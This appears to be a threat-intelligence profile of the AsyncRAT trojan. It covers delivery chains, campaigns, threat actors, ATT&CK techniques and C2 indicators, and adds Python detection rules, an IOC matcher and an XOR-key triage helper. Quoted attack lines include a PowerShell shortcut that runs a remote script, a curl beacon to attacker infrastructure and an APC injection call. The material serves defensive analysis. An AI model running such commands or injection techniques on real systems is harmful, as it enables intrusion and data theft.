AsyncRAT
AsyncRAT is an open-source .NET remote access trojan (RAT) widely used in cybercriminal activity and observed across numerous phishing, loader, and malware-delivery campaigns. It is commonly delivered through phishing attachments and links, including malicious LNK files, HTML smuggling, ZIP archives, ISO/ZIP/DLL/VBS/EXE chains, and abuse of Windows search-ms/search protocol handlers. It has also been delivered by custom and commodity loaders such as HeartCrypt-packed executables, PanthomVAI-style loaders, and the VOID#GEIST framework, where encrypted AsyncRAT shellcode was staged and injected into suspended explorer.exe processes. AsyncRAT has been observed as a final payload alongside or instead of other commodity malware such as Remcos RAT, XWorm, XenoRAT, DarkCloud, SmokeLoader, and Rhadamanthys.
Documented behaviors include TLS-encrypted command-and-control communications, the ability to proxy C2 traffic through a Tor client, scheduled-task persistence via schtasks.exe, and use of batch-script timeout delays to postpone cleanup of samples from %TEMP%. In one 2026 SEO-poisoning campaign documented by FOX-IT and NCC Group, AsyncRAT was deployed after installation of a weaponized ConnectWise ScreenConnect client and executed via VBScript/PowerShell and in-memory .NET loading with process hollowing into RegAsm.exe. That sample used the mutex confing_me_s, connected to hone32[.]work[.]gd and mora1987[.]work[.]gd on ports 1800-1803, and exhibited hallmark AsyncRAT traits including the default X.509 certificate CN=AsyncRAT Server, AES-256-CBC plus HMAC-SHA256 configuration protection, PBKDF2-derived keys, and TLS-based length-prefixed C2 framing. The same sample supported keylogging, clipboard monitoring, a cryptocurrency clipper for multiple currencies, victim profiling, wallet discovery, and dynamic loading of arbitrary .NET plugins over C2; it stored keystrokes in %AppData%\Keyboard\Log.tmp and clipboard captures in %AppData%\Keyboard\ClipBoard MM-dd-yyyy.tmp.
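The host artifacts in the paragraph above (schtasks.exe persistence, process hollowing into RegAsm.exe launched from VBScript/PowerShell, and the keystroke and clipboard files under %AppData%\Keyboard\) translate directly into hunting rules. The block below is an added example, not code from this page or from the FOX-IT/NCC Group report it cites: three rules run over a handful of constructed Sysmon-style events. The event schema (EventType, Image, ParentImage, CommandLine, TargetFilename) and the SCRIPT_HOSTS parent list are assumptions; the file-name patterns and process names are taken from the paragraph.

```python
"""Hunt for the AsyncRAT host artifacts described above in process/file telemetry.

Added example; not code from this page or from the FOX-IT/NCC Group report it
cites. Event schema (EventType, Image, ParentImage, CommandLine, TargetFilename)
follows Sysmon field names but is an assumption; SCRIPT_HOSTS is also my
assumption. File names and process names come from the page. All sample
events below are constructed, not captured.
"""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "cmd.exe", "mshta.exe"}                      # assumed parent list
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)
# %AppData%\Keyboard\Log.tmp and %AppData%\Keyboard\ClipBoard MM-dd-yyyy.tmp
KEYLOG_FILE = re.compile(
    r"\\AppData\\Roaming\\Keyboard\\(Log|ClipBoard \d{2}-\d{2}-\d{4})\.tmp$", re.I)
TASK_RUN_ARG = re.compile(r"/tr\s+\"?([^\"]+)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_schtasks_user_writable(ev: dict) -> bool:
    """schtasks /create whose task action (/tr) lives in a user-writable directory."""
    if ev.get("EventType") != "ProcessCreate" or basename(ev.get("Image", "")) != "schtasks.exe":
        return False
    cmd = ev.get("CommandLine", "")
    m = TASK_RUN_ARG.search(cmd)
    return "/create" in cmd.lower() and m is not None and USER_WRITABLE.search(m.group(1)) is not None


def rule_regasm_from_script_host(ev: dict) -> bool:
    """RegAsm.exe (the hollowing target) spawned by a script interpreter."""
    return (ev.get("EventType") == "ProcessCreate"
            and basename(ev.get("Image", "")) == "regasm.exe"
            and basename(ev.get("ParentImage", "")) in SCRIPT_HOSTS)


def rule_asyncrat_keylog_file(ev: dict) -> bool:
    """Keystroke or clipboard capture file written under %AppData%\\Keyboard\\."""
    return (ev.get("EventType") == "FileCreate"
            and KEYLOG_FILE.search(ev.get("TargetFilename", "")) is not None)


RULES = {
    "schtasks_persistence_user_writable": rule_schtasks_user_writable,
    "regasm_spawned_by_script_host": rule_regasm_from_script_host,
    "asyncrat_keylog_clipboard_file": rule_asyncrat_keylog_file,
}


def hunt(events):
    """Return (rule_name, event_index) for every rule that fires on every event."""
    return [(name, i) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


NET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
SAMPLE_EVENTS = [  # constructed
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /create /f /sc onlogon /rl highest /tn "Updater" '
                    r'/tr "C:\Users\bob\AppData\Local\Temp\svchost.exe"'},
    {"EventType": "ProcessCreate", "Image": NET + r"\RegAsm.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": NET + r"\RegAsm.exe"},
    {"EventType": "FileCreate", "Image": NET + r"\RegAsm.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Roaming\Keyboard\Log.tmp"},
    {"EventType": "FileCreate", "Image": NET + r"\RegAsm.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Roaming\Keyboard\ClipBoard 03-14-2026.tmp"},
    # Benign noise that the rules must not flag:
    {"EventType": "ProcessCreate", "Image": NET + r"\RegAsm.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": "RegAsm.exe MyLib.dll /codebase"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'schtasks /create /tn "Office Update" '
                    r'/tr "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe"'},
]

if __name__ == "__main__":
    for name, idx in hunt(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"{name}: {ev.get('CommandLine') or ev.get('TargetFilename')}")
```

Only the /tr target of schtasks is inspected, so a task created by an installer that points into Program Files is not flagged, and a RegAsm.exe started by Visual Studio is ignored because its parent is not a script host. Tune SCRIPT_HOSTS to whatever legitimately spawns RegAsm.exe in your environment, and remember that a hollowed RegAsm.exe shows no suspicious command line of its own, which is why the parent relationship carries the signal.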
AsyncRAT has been associated in reporting with multiple threat clusters and campaigns, including TA2541 use of TLS-encrypted C2, SideCopy’s prior pattern of adopting open-source RATs such as AsyncRAT, and phishing activity discussed in relation to Kimsuky/APT-C-55. It has also been observed in attacks against vulnerable MySQL servers and in broad C2 telemetry datasets. High-confidence indicators directly mentioned in the source material include C2 IPs 79.110.49.162 and 111.90.150.186 on ports 6606, 7707, 8808, 8753, 8977, and 9907 from a Trellix-documented campaign; domains hone32[.]work[.]gd and mora1987[.]work[.]gd on ports 1800-1803 from the 2026 SEO-poisoning campaign; mutex confing_me_s; and the default certificate subject CN=AsyncRAT Server.
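The indicators listed above are printed defanged and carry port context that matters for confidence; matching them against flow or DNS telemetry needs a refang step, an exact-or-subdomain hostname comparison that does not match the shared parent domain, and a port check. The block below is an added example, not from this page or from Trellix or FOX-IT. The indicator values are the ones quoted above; the flow records, the record schema (src, dst_ip, dst_port, sni) and the two confidence tiers are my own constructions.

```python
"""Match this page's AsyncRAT network indicators against flow/DNS telemetry.

Added example, not from this page or from Trellix/FOX-IT. The indicator values
are the ones the page quotes; the flow records, the record schema
(src, dst_ip, dst_port, sni) and the confidence tiers are my own constructions.
"""
import ipaddress
from dataclasses import dataclass

RAW_IOCS = {  # copied defanged, exactly as reports print them
    "ips": ["79.110.49.162", "111.90.150.186"],
    "ip_ports": [6606, 7707, 8808, 8753, 8977, 9907],
    "domains": ["hone32[.]work[.]gd", "mora1987[.]work[.]gd"],
    "domain_ports": range(1800, 1804),
}


def refang(s: str) -> str:
    """Undo common defanging so indicators compare equal to live telemetry."""
    return (s.replace("[.]", ".").replace("(.)", ".").replace("(dot)", ".")
             .replace("hxxps://", "https://").replace("hxxp://", "http://")
             .strip().lower().rstrip("."))


@dataclass(frozen=True)
class Flow:
    src: str
    dst_ip: str
    dst_port: int
    sni: str = ""          # TLS SNI or DNS query name, when the sensor has one


@dataclass(frozen=True)
class Match:
    flow: Flow
    indicator: str
    confidence: str        # "high" = IOC plus its reported port, "medium" = IOC only


def build_matcher(iocs):
    ips = {ipaddress.ip_address(i) for i in iocs["ips"]}
    ip_ports = set(iocs["ip_ports"])
    domains = {refang(d) for d in iocs["domains"]}
    domain_ports = set(iocs["domain_ports"])

    def match(flow: Flow):
        hits = []
        if ipaddress.ip_address(flow.dst_ip) in ips:
            conf = "high" if flow.dst_port in ip_ports else "medium"
            hits.append(Match(flow, flow.dst_ip, conf))
        host = refang(flow.sni) if flow.sni else ""
        for d in domains:
            # exact host or a subdomain of it; never the shared parent (work.gd)
            if host == d or host.endswith("." + d):
                conf = "high" if flow.dst_port in domain_ports else "medium"
                hits.append(Match(flow, d, conf))
        return hits
    return match


def hunt(flows, iocs=RAW_IOCS):
    match = build_matcher(iocs)
    return [h for f in flows for h in match(f)]


SAMPLE_FLOWS = [  # constructed; 203.0.113.x / 198.51.100.x are documentation ranges
    Flow("10.0.0.5", "79.110.49.162", 6606),                       # IOC IP on a reported port
    Flow("10.0.0.5", "79.110.49.162", 443),                        # IOC IP, port not reported
    Flow("10.0.0.7", "203.0.113.10", 1801, "hone32.work.gd"),      # IOC host on a reported port
    Flow("10.0.0.7", "203.0.113.10", 443, "cdn.work.gd"),          # parent domain only: no hit
    Flow("10.0.0.9", "111.90.150.186", 9907),                      # IOC IP on a reported port
    Flow("10.0.0.9", "198.51.100.53", 53, "mora1987.work.gd"),     # DNS lookup of IOC host
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_FLOWS):
        print(f"[{h.confidence}] {h.flow.src} -> {h.flow.dst_ip}:{h.flow.dst_port} matched {h.indicator}")
```

A hit on the IP or hostname without the reported port is kept but downgraded, because commodity C2 is often parked on shared hosting and the operator can rebind ports between campaigns; a hit on the port alone is not emitted at all, since the ports quoted here are not unique to AsyncRAT.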
Vulnerabilities exploited
3 CVEs Mallory has correlated with this family across public research and vendor advisories.
"...Colombian organizations were reported by Darktrace to have been targeted by Blind Eagle in an attack campaign involving the abuse of the Windows vulnerability, tracked as CVE-2024-43451, that has been ongoing since November."
Google also observed financially motivated actors exploiting the WinRAR path-traversal flaw to distribute commodity remote access tools and information stealers such as XWorm and AsyncRAT...
The authoring agencies have identified the following open source and dual-use tools as used and/or customized by the actors: ▪ AsyncRAT
Groups observed using it
18 distinct threat actors attributed by public researchers.
The use of XenoRAT specifically strengthens this attribution, as Seqrite Labs confirmed in December 2024 that SideCopy had formally adopted customised XenoRAT variants as part of their updated toolset, following a similar pattern of open-source RAT adoption seen previously with AsyncRAT.
TA2541 has used TLS encrypted C2 communications including for campaigns using AsyncRAT.
Post by lazarusholic (lazarusholic.bsky.social): "Analysis of the APT-C-55 (Kimsuky) group's attack campaign distributing malicious payloads via GitHub and Dropbox" (original title: "APT-C-55(Kimsuky)组织依托GitHub+Dropbox分发恶意载荷的攻击活动分析"), published by Qihoo360. #APT-C-55, #AsyncRAT, #Github, #LNK, #DPRK, #CTI
The terminal payload is typically XWorm or AsyncRAT, both commodity RATs sold through underground forums as Malware-as-a-Service.
Prior to mid-2024, this actor mostly deployed AsyncRAT and used ScreenConnect as a first stage payload less frequently. However, since mid-2024, the actor has primarily used ScreenConnect as an initial access payload. Proofpoint has also observed ScreenConnect on several occasions download and install AsyncRAT following an infection.
The intrusions involved the use of a widely available .NET-based remote access Trojan AsyncRAT. ... AsyncRAT gives attackers a range of capabilities, including keystroke logging, screen capture and remote command execution.
“The execution of the BAT file led to a PowerShell helper script that downloaded a follow-on payload, AsyncRAT,” researchers wrote.
"...VBS scripts meant to load second-stage malware, which were usually open-source remote access trojans like Remcos RAT or AsyncRAT..."
TA571 regularly uses 404 TDS in campaigns to deliver malware, including AsyncRAT, NetSupport, and DarkGate.
TAG-144 has employed a wide array of open-source and cracked RATs, including AsyncRAT, DcRAT, REMCOS RAT, XWorm, and LimeRAT, among others.
...glib-2.0.dll: malicious library responsible for injecting AsyncRAT into the MSBuild.exe process...
The authoring agencies have identified the following open source and dual-use tools as used and/or customized by the actors: ▪ AsyncRAT
The toolkit includes PureLogs, PureHVNC, and repackaged commodity RATs (AsyncRAT, VenomRAT, DcRat, XWorm).
First released in 2019, AsyncRAT enables long-term unauthorized access and post-compromise control, making it a reliable tool for credential theft, lateral movement staging, and follow-on payload delivery.
China-Linked MirrorFace Deploys ANEL and AsyncRAT in New Cyber Espionage Operation
Techniques & procedures
38 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
Sophos thinks a single person or group called "ischhfd83" is behind more than a hundred backdoored malware variants... Researchers linked the hundreds of GitHub repositories to a single Russian email address... Sophos researchers looked into ischhfd83's other repositories, finding 141, 133 of which were backdoored in some way or another.
MITRE ATT&CK® Techniques ... Initial Access T1566.001 ... Spearphishing Attachment
MITRE ATT&CK® Techniques ... Initial Access T1566.002 ... Spearphishing Link
Execution
8 techniques
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
In this variant, SwiftCopy shortcut file runs the PowerShell executable (powershell.exe) with the following parameters: ‘-ExecutionPolicy Bypass’ ... ‘-File \\internetshortcuts[.]link@80\ePWXBTXU\over.ps1’
APT1 has used the Windows command shell to execute commands, and batch scripting to automate execution. Blue Mockingbird has used batch script files to automate execution and deployment of payloads. During HomeLand Justice, threat actors used Windows batch files for persistence and execution.
It executes its primary payload using the command: python runn.py -p new.bin -k a.json
MITRE ATT&CK Matrix ... Initial Access ... T1203 – Exploitation for Client Execution
Upon clicking the link in email or attachment, recipient would be redirected to the website abusing “search-ms” URI protocol handler.
As a result, the user is more likely to open the file, assuming it is from their own system, and unknowingly execute malicious code.
DLL sideloading (T1574.001) is a technique in which attackers place a malicious DLL in a location that a legitimate application will load instead of the expected library... Among these is a malicious libvlc.dll, which, as a core dependency of vlc.exe, is sideloaded early in the application's execution. | Because Windows searches for DLLs in specific directories, the malicious DLL is loaded and executed when the trusted program starts.
Persistence
3 techniques
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Privilege Escalation
4 techniques
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The VBS files execute PowerShell to inject the malicious dll into a legitimate file, accompanied by the opening of a decoy PDF file to deceive victims.
The decrypted payloads are not written to disk as executables. Instead, they are injected directly into separate instances of explorer.exe using Early Bird APC injection... QueueUserAPC(shellcode_ptr, target_thread, 0)
Stealth
11 techniques
The intrusion relies on an obfuscated batch script (non.bat) to deliver multiple encrypted RAT shellcode payloads... Encrypted shellcode payloads... decrypted dynamically at runtime using XOR key material stored in JSON configuration files
HTML smuggling, a highly evasive malware delivery technique that leverages legitimate HTML5 and JavaScript features, is increasingly used in email campaigns... When a target user opens the HTML in their web browser, the browser decodes the malicious script, which, in turn, assembles the payload on the host device.
The VBS files execute PowerShell to inject the malicious dll into a legitimate file, accompanied by the opening of a decoy PDF file to deceive victims.
The decrypted payloads are not written to disk as executables. Instead, they are injected directly into separate instances of explorer.exe using Early Bird APC injection... QueueUserAPC(shellcode_ptr, target_thread, 0)
MITRE ATT&CK Matrix ... Defense Evasion ... T1070.004 – Indicator Removal on Host: File Deletion
The script then loads the XOR decryption key from a.json... Upon decoding, the script performs an XOR-based decryption in memory
If the victim clicks on the opened shortcut file, then the malicious DLL file referenced in the command line is executed using the regsvr32.exe utility.
Several entries describe malware examining running processes to determine if a debugger, sandbox, virtual environment, or analysis/security tools are present, such as AsyncRAT checking for a debugger, RogueRobin enumerating Wireshark and Sysinternals processes, and P8RAT checking for processes associated with virtual environments.
Virtualization/Sandbox Evasion: Time Based Checks - T1497.003 The STRT identified an interesting TTP associated with DarkCrystal RAT, the use of “W32tm” command with the “stripchart” parameter as an execution‑delay mechanism for both runtime and beaconing activities.
DLL sideloading (T1574.001) is a technique in which attackers place a malicious DLL in a location that a legitimate application will load instead of the expected library... Among these is a malicious libvlc.dll, which, as a core dependency of vlc.exe, is sideloaded early in the application's execution. | Because Windows searches for DLLs in specific directories, the malicious DLL is loaded and executed when the trusted program starts.
All decrypted shellcode payloads (XWorm, XenoRAT, AsyncRAT) execute directly in memory; no decrypted executables are ever written to disk
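Two entries in this section describe the same loader pattern: an obfuscated batch script hands a blob (new.bin) and a JSON file (a.json) to a Python stub, which XOR-decrypts shellcode in memory with key material taken from the JSON. When an analyst recovers both files from disk, the first question is which value in the JSON is the key and how it is encoded. The block below is an added example, not this page's code and not the campaign's runn.py: it tries every string value in the JSON as a key in raw, hex and base64 form and ranks the decryptions with a payload-likeness heuristic. The JSON layout, the key encoding, the heuristic and the sample blob/key/config are all my own constructions, because the page documents none of them.

```python
"""Triage helper for the XOR-with-key-from-JSON loader pattern described above.

Added example; not this page's code and not the campaign's runn.py. The page
says only that shellcode was XOR-decrypted in memory with key material read
from a JSON file (a.json); the JSON layout and key encoding are undocumented,
so every string value in the JSON is tried as a key (raw, hex and base64
forms) and the decryptions are ranked by a payload-likeness heuristic.
The blob, key and config below are constructed for the demonstration.
"""
import base64
import binascii
import json
import math
from collections import Counter


def xor_repeating(data: bytes, key: bytes) -> bytes:
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _strings(obj):
    """Yield every string value at any depth of a parsed JSON document."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from _strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _strings(v)


def candidate_keys(config) -> list[bytes]:
    """Each string as raw UTF-8, plus hex and base64 decodings where they parse."""
    seen, out = set(), []
    for s in _strings(config):
        forms = [s.encode()]
        try:
            forms.append(bytes.fromhex(s))
        except ValueError:
            pass
        try:
            forms.append(base64.b64decode(s, validate=True))
        except (binascii.Error, ValueError):
            pass
        for k in forms:
            if k and k not in seen:
                seen.add(k)
                out.append(k)
    return out


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def score(plain: bytes) -> float:
    """Higher is more payload-like. PE markers dominate; otherwise prefer output
    whose entropy has dropped below the near-8-bits/byte of a wrong-key result."""
    s = 0.0
    if plain[:2] == b"MZ":
        s += 100.0
    if b"This program cannot be run in DOS mode" in plain:
        s += 50.0
    return s + (8.0 - shannon_entropy(plain))


def recover(blob: bytes, config):
    """Return (best_key, plaintext, ranked) where ranked is [(score, key), ...]."""
    ranked = sorted(((score(xor_repeating(blob, k)), k) for k in candidate_keys(config)),
                    key=lambda t: t[0], reverse=True)
    best_key = ranked[0][1]
    return best_key, xor_repeating(blob, best_key), ranked


# --- constructed sample: a fake PE header XORed with a key hidden as base64 in the JSON
SAMPLE_KEY = b"S3cr3tK3y!"
SAMPLE_PLAIN = (b"MZ\x90\x00" + b"\x00" * 56
                + b"This program cannot be run in DOS mode.\r\n" + b"\x00" * 24)
SAMPLE_BLOB = xor_repeating(SAMPLE_PLAIN, SAMPLE_KEY)             # stands in for new.bin
SAMPLE_CONFIG = {                                                 # stands in for a.json
    "build": "2.1",
    "opts": {"k": base64.b64encode(SAMPLE_KEY).decode(), "note": "decoy"},
    "hosts": ["a.example", "deadbeef"],
}
SAMPLE_CONFIG_JSON = json.dumps(SAMPLE_CONFIG)

if __name__ == "__main__":
    key, plain, ranked = recover(SAMPLE_BLOB, json.loads(SAMPLE_CONFIG_JSON))
    print("best key:", key, "score:", round(ranked[0][0], 2))
    print("plaintext head:", plain[:16])
```

For a real sample, replace SAMPLE_BLOB with the bytes of the recovered blob and SAMPLE_CONFIG with json.load() of the recovered JSON. The scoring only knows PE markers and an entropy drop; position-independent shellcode has no magic bytes, so for those inspect the top few ranked candidates by hand (or disassemble them) rather than trusting ranked[0]. Every candidate decryption stays in memory, so nothing decrypted is ever written to disk unless you choose to save it.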
Defense Impairment
1 technique
Discovery
8 techniques
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
Examples include 'TrickBot can identify the user and groups the user belongs to on a compromised host' and multiple entries checking whether the current user is an administrator or has elevated privileges.
MITRE ATT&CK® Techniques ... Discovery T1082 System Information Discovery
MITRE ATT&CK Matrix ... Discovery T1083 – File and Directory Discovery
Several entries describe malware examining running processes to determine if a debugger, sandbox, virtual environment, or analysis/security tools are present, such as AsyncRAT checking for a debugger, RogueRobin enumerating Wireshark and Sysinternals processes, and P8RAT checking for processes associated with virtual environments.
Virtualization/Sandbox Evasion: Time Based Checks - T1497.003 The STRT identified an interesting TTP associated with DarkCrystal RAT, the use of “W32tm” command with the “stripchart” parameter as an execution‑delay mechanism for both runtime and beaconing activities.
MITRE ATT&CK Matrix ... Discovery T1518 – Software Discovery
Collection
1 technique
Xworm Capabilities & Impact... Data Theft: Credential stealing, keylogging, screen capturing... XenoRAT... Information Theft: Keylogging, clipboard monitoring, credential harvesting, and screen capturing... AsyncRAT... Information Theft: Keylogging, clipboard monitoring, credential harvesting, and screen capturing.
Command and Control
7 techniques
Further we see usage of PROPFIND method ... GET method is used to retrieve the content of the file ... MITRE ATT&CK® Techniques ... Command and Control T1071 Application Layer Protocol
The infection chain concludes by transmitting a minimal HTTP beacon back to attacker-controlled command-and-control (C2) infrastructure hosted on TryCloudflare... curl -X POST -d “status=success”
During the 2025 Poland Wiper Attacks, the adversaries utilized Tor nodes for C2. APT28 has routed traffic over Tor and VPN servers to obfuscate their activities. A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network.
A lightweight HTTP POST beacon (status=success) is transmitted to attacker-controlled infrastructure hosted on TryCloudflare, providing operators confirmation of successful staging and injection.
This PowerShell command downloads and executes another PowerShell script... This script downloads two further files... The downloader batch file... also downloads and executes the final payload...
MITRE ATT&CK® Techniques ... Command and Control T1571 Non-Standard Port
For all the network activity, the attacker has employed SSL (Secure Sockets Layer) encryption as a clever tactic to evade network protection measures.
Exfiltration
1 technique
Xworm Capabilities & Impact... Data Theft... Enables attackers to conduct espionage... The infection chain concludes by transmitting a minimal HTTP beacon back to attacker-controlled command-and-control (C2) infrastructure
IOCs tracked for this family
505 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
200 sources tracked across advisories, community write-ups, and news.
Referenced as another open-source RAT previously adopted by SideCopy in a similar pattern to XenoRAT.
A remote access trojan observed among the offensive tooling hosted across the region.
Remote access trojan observed among malware families tied to regional C2 infrastructure.
Remote access trojan used as a downloaded payload in the search-ms abuse campaign, enabling remote control of infected systems and malicious actions such as information theft, monitoring, and command execution.